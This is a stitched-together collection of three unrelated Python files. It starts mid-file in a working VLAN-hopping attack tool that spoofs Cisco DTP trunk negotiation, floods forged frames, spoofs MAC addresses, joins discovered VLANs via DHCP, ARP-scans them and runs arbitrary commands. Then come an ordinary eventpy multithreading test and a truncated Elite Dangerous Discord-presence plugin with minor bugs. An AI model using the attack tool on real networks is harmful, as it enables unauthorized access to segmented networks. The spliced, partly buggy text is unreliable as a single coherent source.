sys.stdout.write('[!] ' + x + '\n')
@staticmethod
def fail(x):
Logger._out('[-] ' + x)
@staticmethod
def ok(x):
Logger._out('[+] ' + x)
def inspectPacket(dtp):
tlvs = dtp['DTP'].tlvlist
stat = -1
for tlv in tlvs:
if tlv.type == 2:
stat = ord(tlv.status)
break
ret = True
if stat == -1:
Logger.fail('Something went wrong: Got invalid DTP packet.')
ret = False
elif stat == 2:
Logger.fail('DTP disabled, Switchport in Access mode configuration')
print('[!] VLAN Hopping is not possible.')
ret = False
elif stat == 3:
Logger.ok('DTP enabled, Switchport in default configuration')
print('[+] VLAN Hopping is possible.')
elif stat == 4 or stat == 0x84:
Logger.ok('DTP enabled, Switchport in Dynamic Auto configuration')
print('[+] VLAN Hopping is possible.')
elif stat == 0x83:
Logger.ok('DTP enabled, Switchport in Trunk/Desirable configuration')
print('[+] VLAN Hopping is possible.')
elif stat == 0x81:
Logger.ok('DTP enabled, Switchport in Trunk configuration')
print('[+] VLAN Hopping IS possible.')
elif stat == 0xa5:
Logger.info('DTP enabled, Switchport in Trunk with 802.1Q encapsulation forced configuration')
print('[?] VLAN Hopping may be possible.')
elif stat == 0x42:
Logger.info('DTP enabled, Switchport in Trunk with ISL encapsulation forced configuration')
print('[?] VLAN Hopping may be possible.')
else:
Logger.info('Unknown DTP packet.')
Logger.dbg(dtp.show())
ret = False
if ret:
print('\n[>] After Hopping to other VLANs - leave this program running to maintain connections.')
return ret
def floodTrunkingRequests():
while not stopThreads:
# Ethernet
dot3 = Dot3(src = config['macaddr'], dst = '01:00:0c:cc:cc:cc', len = 42)
# Logical-Link Control
llc = LLC(dsap = 0xaa, ssap = 0xaa, ctrl = 3)
# OUT = Cisco, Code = DTP
snap = SNAP(OUI = 0x0c, code = 0x2004)
# DTP, Status = Access/Desirable (3), Type: Trunk (3)
dtp = DTP(ver = 1, tlvlist = [
DTPDomain(length = 13, type = 1, domain = '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'),
DTPStatus(status = '\\x03', length = 5, type = 2),
DTPType(length = 5, type = 3, dtptype = '\\xa5'),
DTPNeighbor(type = 4, neighbor = config['macaddr'], len = 10)
])
frame = dot3 / llc / snap / dtp
Logger.dbg('SENT: DTP Trunk Keep-Alive:\n{}'.format(frame.summary()))
send(frame, iface = config['interface'], verbose = False)
time.sleep(config['timeout'] / 3)
def engageDot1qSniffer():
global dot1qSnifferStarted
if dot1qSnifferStarted:
return
dot1qSnifferStarted = True
#Logger.info('Started VLAN/802.1Q sniffer.')
sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
sock.bind((config['interface'], ETH_P_ALL))
enable_auxdata(sock)
print('[>] Discovering new VLANs...')
while not stopThreads:
buf = recv(sock, 65535)
pkt = Ether(buf)
if pkt.haslayer(Dot1Q):
dot1q = pkt.vlan
if dot1q not in vlansDiscovered:
print('==> VLAN discovered: {}'.format(dot1q))
vlansDiscovered.add(dot1q)
if not config['analyse']:
t = threading.Thread(target = addVlanIface, args = (dot1q, ))
t.daemon = True
t.start()
else:
Logger.info('Analysis mode: Did not go any further.')
Logger.info('Stopped VLAN/802.1Q sniffer.')
def processDtps(dtps):
global attackEngaged
if stopThreads: return
if attackEngaged == False:
success = False
for dtp in dtps:
if dtp.haslayer(DTP):
if inspectPacket(dtp):
success = True
break
if success:
#Logger.ok('VLAN Hopping via Switch Spoofing may be possible.')
Logger.dbg('Flooding with fake Access/Desirable DTP frames...\n')
t = threading.Thread(target = floodTrunkingRequests)
t.daemon = True
t.start()
attackEngaged = True
time.sleep(5)
if config['force']:
Logger.ok('FORCED VLAN Hopping via Switch Spoofing.')
Logger.ok('Flooding with fake Access/Desirable DTP frames...\n')
t = threading.Thread(target = floodTrunkingRequests)
t.daemon = True
t.start()
attackEngaged = True
time.sleep(5)
if attackEngaged:
engageDot1qSniffer()
def launchCommand(subif, cmd, forceOut = False, noCmd = False):
# following placeholders in command:
# $GW (gateway),
# $MASK (full mask),
Logger.dbg('Subinterface: {}, Parsing command: "{}"'.format(subif, cmd))
if '%IFACE' in cmd: cmd = cmd.replace('%IFACE', subif)
if '%HWADDR' in cmd: cmd = cmd.replace('%HWADDR', getHwAddr(subif))
if '%IP' in cmd: cmd = cmd.replace('%IP', getIfaceIP(subif))
if '%NET' in cmd: cmd = cmd.replace('%NET', shell("route -n | grep " + subif + " | grep -v UG | awk '{print $1}' | head -1"))
if '%MASK' in cmd: cmd = cmd.replace('%MASK', shell("route -n | grep " + subif + " | grep -v UG | awk '{print $3}' | head -1"))
if '%GW' in cmd: cmd = cmd.replace('%GW', shell("route -n | grep " + subif + " | grep UG | awk '{print $2}' | head -1"))
if '%CIDR' in cmd: cmd = cmd.replace('%CIDR', '/' + shell("ip addr show " + subif + " | grep 'inet ' | awk '{print $2}' | cut -d/ -f2"))
cmd = cmd.strip()
if not noCmd:
print('[>] Launching command: "{}"'.format(cmd))
out = shell(cmd)
if forceOut:
print('\n' + '.' * 50)
print(out)
print('.' * 50 + '\n')
else:
Logger.info(out)
def launchCommands(subif, commands, forceOut = False, noCmd = False):
for cmd in commands:
launchCommand(subif, cmd, forceOut, noCmd)
def addVlanIface(vlan):
global subinterfaces
global vlansLeases
global tempfiles
subif = '{}.{}'.format(config['interface'], vlan)
if subif in subinterfaces:
Logger.fail('Already created that subinterface: {}'.format(subif))
return
Logger.dbg('Creating new VLAN Subinterface for {}.'.format(vlan))
out = shell('vconfig add {} {}'.format(
config['interface'], vlan
))
if out.startswith('Added VLAN with VID == {}'.format(vlan)):
subinterfaces.add(subif)
pidFile = tempfile.NamedTemporaryFile().name
dbFile = tempfile.NamedTemporaryFile().name
tempfiles.append(pidFile)
tempfiles.append(dbFile)
Logger.dbg('So far so good, subinterface {} added.'.format(subif))
ret = False
for attempt in range(2):
Logger.dbg('Acquiring DHCP lease for {}'.format(subif))
shell('dhclient -lf {} -pf {} -r {}'.format(dbFile, pidFile, subif))
time.sleep(3)
if attempt > 0:
shell('dhclient -lf {} -pf {} -x {}'.format(dbFile, pidFile, subif))
time.sleep(3)
shell('dhclient -lf {} -pf {} {}'.format(dbFile, pidFile, subif))
time.sleep(3)
ip = getIfaceIP(subif)
if ip:
Logger.dbg('Subinterface obtained IP: {}'.format(ip))
ret = True
vlansHopped.add(vlan)
vlansLeases[vlan] = (
ip,
shell("route -n | grep " + subif + " | grep -v UG | awk '{print $1}' | head -1"),
shell("ip addr show " + subif + " | grep 'inet ' | awk '{print $2}' | cut -d/ -f2")
)
print('[+] Hopped to VLAN {}.: {}, subnet: {}/{}'.format(
vlan,
vlansLeases[vlan][0],
vlansLeases[vlan][1],
vlansLeases[vlan][2]
))
launchCommands(subif, config['commands'])
if arpScanAvailable:
Logger.info('ARP Scanning connected subnet.')
print('[>] Other hosts in hopped subnet: ')
launchCommand(subif, "arp-scan -x -g --vlan={} -I %IFACE %NET%CIDR".format(vlan), True, True)
break
else:
Logger.dbg('Subinterface {} did not receive DHCPOFFER.'.format(
subif
))
time.sleep(5)
if not ret:
Logger.fail('Could not acquire DHCP lease for: {}. Skipping.'.format(subif))
else:
Logger.fail('Failed.: "{}"'.format(out))
def addVlansFromCdp(vlans):
while not attackEngaged:
time.sleep(3)
if stopThreads:
return
for vlan in vlans:
Logger.info('Trying to hop to VLAN discovered in CDP packet: {}'.format(
vlan
))
t = threading.Thread(target = addVlanIface, args = (vlan, ))
t.daemon = True
t.start()
vlansDiscovered.add(vlan)
def processCdp(pkt):
global cdpsCollected
global vlansDiscovered
if not Dot3 in pkt or not pkt.dst == '01:00:0c:cc:cc:cc':
return
if not hasattr(pkt, 'msg'):
return
tlvs = {
1: 'Device Hostname',
2: 'Addresses',
3: 'Port ID',
4: 'Capabilities',
5: 'Software Version',
6: 'Software Platform',
9: 'VTP Management Domain',
10:'Native VLAN',
14:'VoIP VLAN',
22:'Management Address',
}
vlans = set()
out = ''
for tlv in pkt.msg:
if tlv.type in tlvs.keys():
fmt = ''
key = ' {}:'.format(tlvs[tlv.type])
key = key.ljust(25)
if hasattr(tlv, 'val'): fmt = tlv.val
elif hasattr(tlv, 'iface'): fmt = tlv.iface
elif hasattr(tlv, 'cap'):
caps = []
if tlv.cap & (2**0) != 0: caps.append("Router")
if tlv.cap & (2**1) != 0: caps.append("TransparentBridge")
if tlv.cap & (2**2) != 0: caps.append("SourceRouteBridge")
if tlv.cap & (2**3) != 0: caps.append("Switch")
if tlv.cap & (2**4) != 0: caps.append("Host")
if tlv.cap & (2**5) != 0: caps.append("IGMPCapable")
if tlv.cap & (2**6) != 0: caps.append("Repeater")
fmt = '+'.join(caps)
elif hasattr(tlv, 'vlan'):
fmt = str(tlv.vlan)
vlans.add(tlv.vlan)
elif hasattr(tlv, 'addr'):
for i in range(tlv.naddr):
addr = tlv.addr[i].addr
fmt += '{}, '.format(addr)
wrapper = textwrap.TextWrapper(
initial_indent = key,
width = 80,
subsequent_indent = ' ' * len(key)
)
out += '{}\n'.format(wrapper.fill(fmt))
out = re.sub(r'(?:\n)+', '\n', out)
if not out in cdpsCollected:
cdpsCollected.add(out)
print('\n[+] Discovered new CDP aware device:\n{}'.format(out))
if not config['analyse']:
t = threading.Thread(target = addVlansFromCdp, args = (vlans, ))
t.daemon = True
t.start()
else:
Logger.info('Analysis mode: Did not go any further.')
def packetCallback(pkt):
Logger.dbg('RECV: ' + pkt.summary())
if Dot3 in pkt and pkt.dst == '01:00:0c:cc:cc:cc':
processCdp(pkt)
def sniffThread():
global vlansDiscovered
warnOnce = False
Logger.info('Sniffing for CDP/DTP frames (Max count: {}, Max timeout: {} seconds)...'.format(
config['count'], config['timeout']
))
while not stopThreads and not attackEngaged:
dtps = []
try:
dtps = sniff(
count = config['count'],
filter = 'ether[20:2] == 0x2004 or ether[20:2] == 0x2000',
timeout = config['timeout'],
prn = packetCallback,
stop_filter = lambda x: x.haslayer(DTP) or stopThreads,
iface = config['interface']
)
except Exception as e:
if 'Network is down' in str(e):
break
Logger.err('Exception occured during sniffing: ' + str(e))
if len(dtps) == 0 and not warnOnce:
Logger.fail('It seems like there was no DTP frames transmitted.')
Logger.fail('VLAN Hopping may not be possible (unless Switch is in Non-negotiate state):')
Logger.info('\tSWITCH(config-if)# switchport nonnegotiate\t/ or / ')
Logger.info('\tSWITCH(config-if)# switchport mode access\n')
warnOnce = True
if len(dtps) > 0 or config['force']:
if len(dtps) > 0:
Logger.dbg('Got {} DTP frames.\n'.format(
len(dtps)
))
else:
Logger.info('Forced mode: Beginning attack blindly.')
t = threading.Thread(target = processDtps, args = (dtps, ))
t.daemon = True
t.start()
Logger.dbg('Stopped sniffing.')
def getHwAddr(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', ifname[:15]))
return ':'.join(['%02x' % ord(char) for char in info[18:24]])
def getIfaceIP(iface):
out = shell("ip addr show " + iface + " | grep 'inet ' | awk '{print $2}' | head -1 | cut -d/ -f1")
Logger.dbg('Interface: {} has IP: {}'.format(iface, out))
return out
def changeMacAddress(iface, mac):
old = getHwAddr(iface)
print('[>] Changing MAC address of interface {}, from: {} to: {}'.format(
iface, old, mac
))
shell('ifconfig {} down'.format(iface))
shell('ifconfig {} hw ether {}'.format(iface, mac))
shell('ifconfig {} up'.format(iface))
ret = old != getHwAddr(iface)
if ret:
Logger.dbg('Changed.')
else:
Logger.dbg('Not changed.')
return ret
def assure8021qCapabilities():
if ('not found' in shell('modprobe -n 8021q')):
Logger.err('There is no kernel module named: "8021q". Fatal error.')
return False
if not shell('which vconfig'):
Logger.err('There is no "vconfig" utility. Package required: "vconfig". Fatal error.')
return False
shell('modprobe 8021q')
return True
def shell(cmd):
out = commands.getstatusoutput(cmd)[1]
Logger.dbg('shell("{}") returned:\n"{}"'.format(cmd, out))
return out
def selectDefaultInterface():
global config
commands = {
'ip' : "ip route show | grep default | awk '{print $5}' | head -1",
'ifconfig': "route -n | grep 0.0.0.0 | grep 'UG' | awk '{print $8}' | head -1",
}
for k, v in commands.items():
out = shell(v)
if len(out) > 0:
Logger.info('Default interface lookup command returned:\n{}'.format(out))
config['interface'] = out
return out
return ''
def cleanup():
if config['origmacaddr'] != config['macaddr']:
Logger.dbg('Restoring original MAC address...')
changeMacAddress(config['interface'], config['origmacaddr'])
for subif in subinterfaces:
Logger.dbg('Removing subinterface: {}'.format(subif))
launchCommands(subif, config['exitcommands'])
shell('vconfig rem {}'.format(subif))
Logger.dbg('Removing temporary files...')
for file in tempfiles:
os.remove(file)
def parseOptions(argv):
print('''
:: VLAN Hopping via DTP Trunk negotiation
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
Mariusz B. / mgeeky '18, <[email protected]>
v{}
'''.format(VERSION))
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
parser.add_argument('-i', '--interface', metavar='DEV', default='', help='Select interface on which to operate.')
parser.add_argument('-e', '--execute', dest='command', metavar='CMD', default=[], action='append', help='Launch specified command after hopping to new VLAN. One can use one of following placeholders in command: %%IFACE (choosen interface), %%IP (acquired IP), %%NET (net address), %%HWADDR (MAC), %%GW (gateway), %%MASK (full mask), %%CIDR (short mask). For instance: -e "arp-scan -I %%IFACE %%NET%%CIDR". May be repeated for more commands. The command will be launched SYNCHRONOUSLY, meaning - one have to append "&" at the end to make the script go along.')
parser.add_argument('-E', '--exit-execute', dest='exitcommand', metavar='CMD', default=[], action='append', help='Launch specified command at the end of this script (during cleanup phase).')
parser.add_argument('-m', '--mac-address', metavar='HWADDR', dest='mac', default='', help='Changes MAC address of the interface before and after attack.')
#parser.add_argument('-O', '--outdir', metavar='DIR', dest='outdir', default='', help='If set, enables packet capture on interface connected to VLAN Hopped network and stores in specified output directory *.pcap files.')
parser.add_argument('-f', '--force', action='store_true', help='Attempt VLAN Hopping even if DTP was not detected (like in Nonegotiate situation).')
parser.add_argument('-a', '--analyse', action='store_true', help='Analyse mode: do not create subinterfaces, don\'t ask for DHCP leases.')
parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
parser.add_argument('-d', '--debug', action='store_true', help='Display debug output.')
args = parser.parse_args()
config['verbose'] = args.verbose
config['debug'] = args.debug
config['analyse'] = args.analyse
config['force'] = args.force
config['interface'] = args.interface
config['commands'] = args.command
config['exitcommands'] = args.exitcommand
if args.force:
config['timeout'] = 30
return args
def printStats():
print('\n' + '-' * 80)
print('\tSTATISTICS\n')
print('[VLANS HOPPED]')
if len(vlansHopped):
print('Successfully hopped (and got DHCP lease) to following VLANs ({}):'.format(
len(vlansHopped)
))
for vlan, net in vlansLeases.items():
print('- VLAN {}: {}, subnet: {}/{}'.format(vlan, net[0], net[1], net[2] ))
else:
print('Did not hop into any VLAN.')
print('\n[VLANS DISCOVERED]')
if len(vlansDiscovered):
print('Discovered following VLANs ({}):'.format(
len(vlansDiscovered)
))
for vlan in vlansDiscovered:
print('- VLAN {}'.format(vlan))
else:
print('No VLANs discovered.')
print('\n[CDP DEVICES]')
if len(cdpsCollected):
print('Discovered following CDP aware devices ({}):'.format(
len(cdpsCollected)
))
for dev in cdpsCollected:
print(dev + '\n')
else:
print('No CDP aware devices discovered.')
def main(argv):
global config
global stopThreads
global arpScanAvailable
opts = parseOptions(argv)
if not opts:
Logger.err('Options parsing failed.')
return False
if os.getuid() != 0:
Logger.err('This program must be run as root.')
return False
load_contrib('dtp')
load_contrib('cdp')
if not assure8021qCapabilities():
Logger.err('Unable to proceed.')
return False
if not opts.interface:
if not selectDefaultInterface():
Logger.err('Could not find suitable interface. Please specify it.')
return False
print('[>] Interface to work on: "{}"'.format(config['interface']))
config['origmacaddr'] = config['macaddr'] = getHwAddr(config['interface'])
if not config['macaddr']:
Logger.err('Could not acquire MAC address of interface: "{}"'.format(
config['interface']
))
return False
else:
Logger.dbg('Interface "{}" has MAC address: "{}"'.format(
config['interface'], config['macaddr']
))
config['inet'] = getIfaceIP(config['interface'])
if not config['inet']:
Logger.fail('Could not acquire interface\'s IP address! Proceeding...')
oldMac = config['macaddr']
if opts.mac:
oldMac = changeMacAddress(config['interface'], opts.mac)
if oldMac:
config['macaddr'] = opts.mac
else:
Logger.err('Could not change interface\'s MAC address!')
return False
if shell("which arp-scan") != '':
arpScanAvailable = True
else:
Logger.err('arp-scan not available: will not perform scanning after hopping.')
t = threading.Thread(target = sniffThread)
t.daemon = True
t.start()
try:
while True:
pass
except KeyboardInterrupt:
print('\n[>] Cleaning up...')
stopThreads = True
time.sleep(3)
cleanup()
printStats()
return True
if __name__ == '__main__':
main(sys.argv)
|
test_eventqueue_multithread.py
|
# eventpy library
# Copyright (C) 2020 Wang Qi (wqking)
# Github: https://github.com/wqking/eventpy
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from eventpy.eventqueue import *
import threading
import random
import time
import itertools
def test_multiThreading() :
threadCount = 64
dataCountPerThread = 1024
itemCount = threadCount * dataCountPerThread
eventList = [ x for x in range(itemCount) ]
random.shuffle(eventList)
queue = EventQueue()
dataList = [ 0 for x in range(itemCount) ]
for i in range(itemCount) :
def cb(d, i = i) :
dataList[i] += d
queue.appendListener(eventList[i], cb)
threadList = []
for i in range(threadCount) :
def cb(i = i) :
for k in range(i * dataCountPerThread, (i + 1) * dataCountPerThread) :
queue.enqueue(k, 3)
for k in range(10) :
queue.process()
threadList.append(threading.Thread(target = cb))
for thread in threadList :
thread.start()
for thread in threadList :
thread.join()
compareList = [ 3 for x in range(itemCount) ]
assert dataList == compareList
def doOneThreadWaits(testIndex) :
# note, all events will be process from the other thread instead of main thread
stopEvent = 1
otherEvent = 2
queue = EventQueue()
itemCount = 5
dataList = [ 0 for x in range(itemCount) ]
threadProcessCount = 0
def threadCb() :
nonlocal threadProcessCount
shouldStop = False
def listener1(index) :
nonlocal shouldStop
shouldStop = True
def listener2(index) :
dataList[index] += index + 1
queue.appendListener(stopEvent, listener1)
queue.appendListener(otherEvent, listener2)
while not shouldStop :
queue.wait()
threadProcessCount += 1
queue.process()
thread = threading.Thread(target = threadCb)
assert threadProcessCount == 0
def waitUntilQueueEmpty() :
while queue.waitFor(0.001) :
pass
def testEnqueueOneByOne() :
queue.enqueue(otherEvent, 1)
waitUntilQueueEmpty()
assert threadProcessCount == 1
assert queue.emptyQueue()
assert dataList == [ 0, 2, 0, 0, 0 ]
queue.enqueue(otherEvent, 3)
waitUntilQueueEmpty()
assert threadProcessCount == 2
assert queue.emptyQueue()
assert dataList == [ 0, 2, 0, 4, 0 ]
def testEnqueueTwo() :
queue.enqueue(otherEvent, 1)
time.sleep(0.01)
assert threadProcessCount == 1
assert queue.emptyQueue()
queue.enqueue(otherEvent, 3)
waitUntilQueueEmpty()
assert threadProcessCount == 2
assert dataList == [ 0, 2, 0, 4, 0 ]
def testBatchingEnqueue() :
with DisableQueueNotify(queue) :
queue.enqueue(otherEvent, 2)
time.sleep(0.01)
assert(threadProcessCount == 0)
assert not queue.emptyQueue()
queue.enqueue(otherEvent, 4)
time.sleep(0.01)
assert(threadProcessCount == 0)
assert not queue.emptyQueue()
waitUntilQueueEmpty()
assert threadProcessCount == 1
assert dataList == [ 0, 0, 3, 0, 5 ]
thread.start()
testList = [ testEnqueueOneByOne, testEnqueueTwo, testBatchingEnqueue ]
testList[testIndex]()
queue.enqueue(stopEvent, 1)
thread.join()
def test_oneThreadWaits() :
doOneThreadWaits(0)
doOneThreadWaits(1)
doOneThreadWaits(2)
def test_manyThreadsWait() :
queue = EventQueue()
stopEvent = 1
otherEvent = 2
unit = 3
itemCount = 30 * unit
dataList = [ 0 for x in range(itemCount) ]
shouldStop = False
def listener1() :
nonlocal shouldStop
shouldStop = True
def listener2(index) :
dataList[index] += 1
queue.appendListener(stopEvent, listener1)
queue.appendListener(otherEvent, listener2)
threadList = []
for i in range(itemCount) :
def cb(i = i) :
while True :
while not queue.waitFor(0.01) and not shouldStop :
pass
if shouldStop :
break
queue.process()
threadList.append(threading.Thread(target = cb))
for thread in threadList :
thread.start()
for i in range(itemCount) :
queue.enqueue(otherEvent, i)
time.sleep(0)
for i in range(0, itemCount, unit) :
with DisableQueueNotify(queue) :
for k in range(unit) :
queue.enqueue(otherEvent, i)
time.sleep(0)
queue.enqueue(stopEvent)
for thread in threadList :
thread.join()
all = list(itertools.accumulate(dataList))[-1]
assert all == itemCount * 2
|
load.py
|
# EDMC plugin for reporting a rich presence on discord which will include some basic location information and
plugin_name = "DiscordPresence"
plugin_version = "4.0.0-beta1"
plugin_author = "garud, rglx"
plugin_license = "Apache, 2.0"
# removed config interfacing stuff. if you installed the plugin and then disabled it.... well, there's no reason for that
import functools, l10n # localization tools
import logging # edmc hooks into this and makes logging super easy
import time # getting current timestamp for certain things
import threading # for discord SDK wrapper
from os.path import dirname, join # used in locating our plugin directory and portably getting it for use with the SDK
import tkinter as tk # base tkinter stuff
from config import appname # just need the appname for the logger
from py_discord_sdk import discordsdk as dsdk # discord client SDK wrapper (this is the big one)
# setup EDMC logger
logger = logging.getLogger(f'{appname}.{plugin_name}')
# set up translation system (HELP WANTED PLEASE SEE THE L10n FOLDER)
_ = functools.partial(l10n.Translations.translate, context=__file__)
class DiscordPresence:
def __init__(self):
self.reportedBody = None
self.reportedActivity = None
self.reportedIsOdyssey = None
self.reportedLandingPad = None
# retrieve from an application you create at https://discord.com/developers/applications
self.discordApplicationId = 386149818227097610
# overwritten on plugin UI initialization
self.pluginLabel = None
self.pluginLabelRight = None
self.plugin_dir = None # overwritten on plugin start, points to EDMC's plugins folder
self.plugin_path = None # points to our specific plugin's folder
# massive pile of threads and interfaces that i really don't understand very well (magic, obviously)
self.activity_manager = None # handles discord sdk communication
self.activity = {} # contents of activity information
self.call_back_thread = None # handles responses from discord SDK
self.discord_thread = None # handles starting and in part, management of the SDK
self.discordSdkInterface = None # the actual discord SDK interface itself
self.currentPresenceState = _("Plugin initializing...")
self.currentPresenceDetails = _("{plugin_name} v{plugin_version}, by {plugin_author}").format(plugin_name=plugin_name,plugin_version=plugin_version,plugin_author=plugin_author)
self.currentPresenceTimestamp = int(time.time())
logger.info("instantiated an instance of "+plugin_name+"'s classcode")
# plugin initialization
def plugin_start3(self, plugin_dir):
# create the thread that'll hold our discord API instance and send it off
self.plugin_dir = plugin_dir
self.discord_thread = threading.Thread(target=self.check_run, args=(self.plugin_dir,))
self.discord_thread.setDaemon(True)
self.discord_thread.start()
return plugin_name
# plugin shutdown
def plugin_stop(self):
self.pluginLabelRight["text"] = "Shutting down Discord API..."
self.activity_manager.clear_activity(self.callback)
self.call_back_thread = None
# main window additions
def plugin_app(self, parent):
self.pluginLabel = tk.Label(parent, text="Discord:")
self.pluginLabelRight = tk.Label(parent, text="starting plugin, v"+ plugin_version, anchor=tk.W)
return self.pluginLabel, self.pluginLabelRight
# incoming journal entry from the game. fields like 'station' sometimes are not filled
def journal_entry(self, cmdr, is_beta, system, station, entry, state):
# copy our old states to compare against if they're changed instead of changing them and messing with the API if they're unchanged
newPresenceState = self.currentPresenceState
newPresenceDetails = self.currentPresenceDetails
# retrieve our global information
# get our current station on the off chance it's already set
# this might get a little strange if we're approaching a Horizons station or a dockable Odyssey station and EDMC picks up on it
if station is not None:
self.reportedBody = station
# i suspect "loadgame" event will return "Odyssey": True even in horizons so we're not going to use it here.
if entry["event"] == "Fileheader":
self.reportedIsOdyssey = False
# but we should still account for the fact that Horizons straight-up won't have an "Odyssey" entry field
if "Odyssey" in entry.keys():
self.reportedIsOdyssey == boolean(entry["Odyssey"])
logger.info("Game is Odyssey? "+self.reportedIsOdyssey)
if entry["event"] == "Location":
if entry["Docked"]:
self.reportedBody = entry["StationName"]
else:
self.reportedBody = entry["Body"]
# if EDMC has a "system" known already this is overwritten below, and by design a 'Location' journal entry assures this.
# left just in case something goes wrong with EDMC or the game's journal events
newPresenceDetails = _("Unknown System")
# instance hopping stuff
elif entry["event"] == "StartJump":
self.reportedActivity = None
self.reportedBody = None
# starting a new jump (to SC or to witchspace)
if entry["JumpType"] == "Supercruise":
# entering supercruise
newPresenceDetails = _("Entering supercruise")
elif entry["JumpType"] == "Hyperspace":
# entering hyperspace
newPresenceDetails = _("Entering witchspace")
else:
# ... something else? dunno.
newPresenceDetails = _("Jumping ... somewhere?")
elif entry["event"] == "FSDJump":
# exiting witchspace into a new system
newPresenceDetails = _("In supercruise")
self.reportedActivity = None
self.reportedBody = None
elif entry["event"] == "SupercruiseExit":
# exiting supercruise somewhere
self.reportedBody = entry["Body"]
if self.reportedActivity == "OrbitalCruise":
newPresenceDetails = _("Flying around the surface")
else:
newPresenceDetails = _("Flying in deep space")
elif entry["event"] == "DockingGranted":
# cmdr requested docking & station authorized it
self.reportedLandingPad = str(entry["LandingPad"])
newPresenceDetails = _("Docking to {stationName}").format(stationName=entry["StationName"])
if self.reportedLandingPad != None:
newPresenceDetails += _(" (pad #{landingPadNumber})").format(landingPadNumber=self.reportedLandingPad) # PLEASE MAKE SURE, IN THE TRANSLATIONS, THAT THE LEADING SPACE IS STILL THERE.
elif entry["event"] == "DockingCancelled" or entry["event"] == "DockingDenied" or entry["event"] == "DockingRequested":
# cmdr cancelled docking authorization
# or station refused/revoked docking request (due to distance or shooting people or whatever)
# or docking requested by cmdr
# (these events all mean the same thing)
newPresenceDetails = _("Flying near {stationName}").format(stationName=entry["StationName"])
self.reportedLandingPad = None
elif entry["event"] == "Docked":
# cmdr has either logged in docked or just docked after flying to the station
# (or rebought and is now docked)
newPresenceDetails = _("Docked at {stationName}").format(stationName=entry["StationName"])
if self.reportedLandingPad != None:
newPresenceDetails += _(" (pad #{landingPadNumber})").format(landingPadNumber=self.reportedLandingPad) # PLEASE MAKE SURE, IN THE TRANSLATIONS, THAT THE LEADING SPACE IS STILL THERE.
elif entry["event"] == "Undocked":
# cmdr launching from a landing pad
newPresenceDetails = _("Launching from {stationName}").format(stationName=entry["StationName"])
if self.reportedLandingPad != None:
newPresenceDetails += _(" (pad #{landingPadNumber})").format(landingPadNumber=self.reportedLandingPad) # PLEASE MAKE SURE, IN THE TRANSLATIONS, THAT THE LEADING SPACE IS STILL THERE.
self.reportedLandingPad = None
elif entry["event"] == "SupercruiseEntry":
# entering supercruise
newPresenceDetails = _("In supercruise")
self.reportedActivity = None
self.reportedBody = None
elif entry["event"] == "ApproachBody":
# entering orbital cruise of a planet
self.reportedBody = entry["Body"]
newPresenceDetails = _("In orbital cruise")
self.reportedActivity = "OrbitalCruise"
elif entry["event"] == "ApproachSettlement":
# entering vicinity of an odyssey settlement
self.reportedBody = entry["Name"] # don't include planet body name, just station
elif entry["event"] == "Touchdown" or entry["event"] == "SRVDestroyed":
# GOOOOOOOOOOOOOOOOOOOOOOOOOOOOOAAAAAAAAAALLLLLLLLLLLLLLLLL
# landing on the surface of a planet
newPresenceDetails = _("Landed on the surface")
elif entry["event"] == "Liftoff":
# flying up into the sun like a piece of garbage
newPresenceDetails = _("Flying above the surface")
elif entry["event"] == "LaunchSRV":
newPresenceDetails = _("Driving on the surface")
# todo: find srv retrieval event name
elif entry["event"] == "Disembark":
# leaving your ship/srv/taxi on foot
newPresenceDetails = _("Walking around")
elif entry["event"] == "Embark":
# embarking into a ship SHOULD produce a location event or similar...not sure about dropships/taxis, that may need investigating
if entry["SRV"]:
newPresenceDetails = _("Driving on the surface")
# todo: find dropship-related and taxi-related events and account for them here.
# todo: wait for frontier to implement a journal event that is sent for when a fleet carrier we're docked to starts jumping somewhere else
# coding in something for the "carrierjump" event makes sense and all, but the 'system' above is updated when we get there by other events,
# but our body (and our docked state) remains the same (but not our landing pad. that is almost always different)
elif entry["event"] == "CarrierJump":
newPresenceDetails = _("Docked at {stationName}").format(stationName=entry["StationName"])
self.reportedLandingPad = None # so unset it because ships shuffle around landing pads when a carrier jumps
elif entry["event"] == "Died":
self.reportedBody = None
self.reportedLandingPad = None
self.reportedActivity = None
newPresenceDetails = _("Dead!") # :(
if system != None: # only report our system if we have it to begin with. otherwise just ignore it.
if self.reportedBody == None:
newPresenceState = _("In {system}").format(system=system)
else:
# because saying "In Parrot's Head Sector blah blah, near Parrot's Head Sector blah blah" gets really unnecessary
# might get weird if you have stations or bodies that start with the system's name that shouldn't have it removed.
if self.reportedBody.startswith(system):
self.reportedBody = self.reportedBody.replace(system,_("body"),1) # only do this once
newPresenceState = _("In {system}, near {nearby}").format(system=system,nearby=self.reportedBody)
if newPresenceState != self.currentPresenceState or newPresenceDetails != self.currentPresenceDetails:
self.currentPresenceState = newPresenceState
self.currentPresenceDetails = newPresenceDetails
self.currentPresenceTimestamp = int(time.time()) # update the time as well
# update our plugin UI as well
self.pluginLabelRight["text"] = newPresenceDetails + "\n" + newPresenceState
self.update_presence()
# update our presence in Discord itself via the SDK wrapper
def update_presence(self):
self.activity.state = self.currentPresenceDetails
self.activity.details = self.currentPresenceState
self.activity.timestamps.start = int(self.currentPresenceTimestamp)
self.activity_manager.update_activity(self.activity, self.callback)
# handles returned errors/OK-statuses from the SDK
def callback(self, result):
#logger.info(f'Callback: {result}')
if result == dsdk.Result.ok:
logger.info(f'Successfully set the activity! Code: {result}')
elif result == dsdk.Result.transaction_aborted:
logger.warning(f'Transaction aborted due to SDK shutting down: {result}')
else:
logger.error(f'Error in callback: {result}')
raise Exception(result)
# initial setup and startup
def check_run(self, plugin_dir):
# get our current directory so the SDK wrapper knows where to find the compiled libraries
self.plugin_path = join(dirname(plugin_dir), plugin_name)
# set up our SDK's instance so we can fuck around with it
